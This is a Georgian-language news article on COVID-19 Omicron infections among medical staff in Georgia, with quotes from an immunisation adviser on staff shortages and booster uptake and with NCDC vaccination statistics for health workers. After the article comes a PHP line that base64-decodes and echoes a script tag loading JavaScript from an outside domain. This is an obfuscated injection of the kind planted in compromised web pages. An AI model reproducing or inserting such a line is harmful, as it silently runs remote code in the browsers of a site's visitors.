celsiusi
ავერსი საქკაბელი
ქვეყანაში კორონავირუსით ინფიცირების ყოველდღიური მაჩვენებელი კრიტიკულად იზრდება. კლინიკების წარმომადგენლები ამბობენ, რომ ქვეყანაში ვირუსის გავრცელების პროპორციულად იმატებს ინფიცირების მაჩვენებელი სამედიცინო პერსონალშიც.
 
BMG-სთან ინტერვიუში იმუნიზაციის ტექნიკურ მრჩეველთა ეროვნული ჯგუფის ხელმძღვანელი ივანე ჩხაიძე ამბობს, რომ სამედიცინო პერსონალის პრაქტიკულად 100% სახლშია, რის გამოც კლინიკების უმრავლესობა კადრების დეფიციტს განიცდის.
 
“მიუხედავად იმისა, რომ სამედიცინო პერსონალის აბსოლუტური უმრავლესობა ომიკრონით ინფიცირებულებს ბინაზე მკურნალობს, მათი იზოლაციის ვადიდან გამომდინარე გვიწევს, ყველა სეგმენტში დაფიქსირება ფაქტის, რომ გვაკლია პერსონალი. ესენი არიან ექიმები, და არის საშუალო სამედიცინო პერსონალი. ყველა კლინიკაში, მე არ მგონია სადმე განსხვავებული სიტუაცია იყოს, კადრის დეფიციტია. 8-დღიანი იზოლაციის პირობებში პრობლემები გვექმნება ყველა სეგმენტში - ეს არის გადაუდებელი მედიცინა, თუ ჩვეულებრივი დეპარტამენტი.” - ამბობს ივანე ჩხაიძე.
 
ის ასევე ამბობს, რომ ექიმების ინფიცირების მაღალი მაჩვენებელი ბუსტერ დოზის გაკეთების დაბალ ტემპს უკავშირდება.
 
“ომიკრონის შემთხვევაში, პირველი და აუცილებელი რაც უნდა გაკეთებულიყო, არის ის, რომ ექიმების 90% უნდა ყოფილიყო აცრილი და მეორე რაც მნიშვნელოვანია, ეს არის ბუსტერი. ამის მაჩვენებელია სწორედ ის, რომ ჩვენი კოლეგების პრაქტიკულად 100% სახლშია, რადგან ინფიცირებისაგან ორი დოზა ვაქცინა ვერ გვიცავს. ამიტომ, ბუსტერ დოზების რაოდენობა რაც დღეს სტატისტიკურად დაფიქსირებულია, ნიშნავს იმას, რომ ჩვენ ამ რესურსს არ ვიყენებთ. ქვეყანამ ეს ვერ გამოიყენა და მათ შორის ექიმებმაც. ბუსტერ დოზის არ გაკეთება განაპირობებს ინფიცირების მაღალ მაჩვენებელს.
 
ჩვენ ხშირად ვამბობთ, რომ კრიტიკული მაჩვენებლის ზღვარზე გვიწევს ბოლო ორი კვირის განმავლობაში მუშაობა“, - დასძინა ივანე ჩხაიძემ.
 
დაავადებათა კონტროლის ეროვნული ცენტრის ინფორმაციით, 1 იანვრის მდგომარეობით კოვიდით დაავადებულთა შორის ჯანდაცვის მუშაკების წილობრივი მაჩვენებელი 3.8%-ია. NCDC-ის ბოლო ანგარიშიდან ირკვევა ისიც, რომ 143 პირი, რომელიც სამედიცინო დაწესებულებებში მუშაობდა, კოვიდით განპირობებული მიზეზით გარდაიცვალა.
 
აღსანიშნია ისიც, რომ ჯერ კიდევ დიდია ჯანდაცვის მუშაკთა რაოდენობა, რომლებსაც არათუ ბუსტერ დოზა აქვთ გაკეთებული, არამედ ორჯერადადაც კი არ არიან აცრილები.
 
NCDC-ის სტატისტიკას თუ მოვიშველიებთ, ქვეყნის მასშტაბით არსებული 22 713 ექიმიდან 18 320 ანუ (80,7%) ვაქცინირებულია; 22 376 ექთნიდან კი ვაქცინა ორჯერადად გაკეთებული აქვს 14 244 პირს ანუ (63,7%)-ს, ხოლო 5902 სანიტრიდან სრულად ვაქცინირებულია 3151, რაც საერთო რაოდენობის (53,4%-ია).
758
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");